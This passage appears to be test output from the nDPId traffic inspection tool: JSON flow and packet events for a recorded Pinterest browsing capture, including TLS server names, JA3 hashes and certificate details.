rest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="} 
-00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gCIReACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC5WYBu2PBi7kDA7Y3gBAB9bhLAAABAQgKDEf\/5cK4cls="} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714251,"flow_last_seen":1605289714251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289714251,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605289714251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714251,"pkt":"qtsDr8lk5EKm5WPyht1gCQO3ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RPih0IBu\/o5BzSfc9\/MgBAB9chlAAABAQgK4ziLg8K4a4Y="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714281,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuBhOqRBG+Jl1nfgBAm9NLhAAABAQgKwrkiYM+oHbQ="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvlZgMDtjdjwYu6gBAMIRHEAAABAQgKwrkiZwxF7DU="} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714288,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAKzZE+IqAcsBIEmLB5kd7IUo3\/YpAbuHQp9z38z6OQc1gBALjSOBAAABAQgKwrkiaOM2b+4="} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714558,"flow_last_seen":1605289714558,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714558,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="} 
-00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="} -00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714782,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289714782,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":626,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605289714782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714782,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqIAAAAAoAL9IEOtAAACBAWgBAIICnRgZN4AAAAAAQMDBw=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289714832,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAByAqAcsBIEmLB5kd7IUo3\/YpAbve2qyyOFrOS7qjoBJXgB0bAAACBAV4AQMDAwQCCArCuSSHdGBk3g=="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1605289714832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714832,"pkt":"qtsDr8lk5EKm5WPyht1gCp8uACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAAcg3toBu85LuqOssjhbgBAB+6D6AAABAQgKdGBlEMK5JIc="} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714782,"flow_last_seen":1605289714833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714833,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":870,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714782,"flow_last_seen":1605289714867,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714867,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"images.unsplash.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 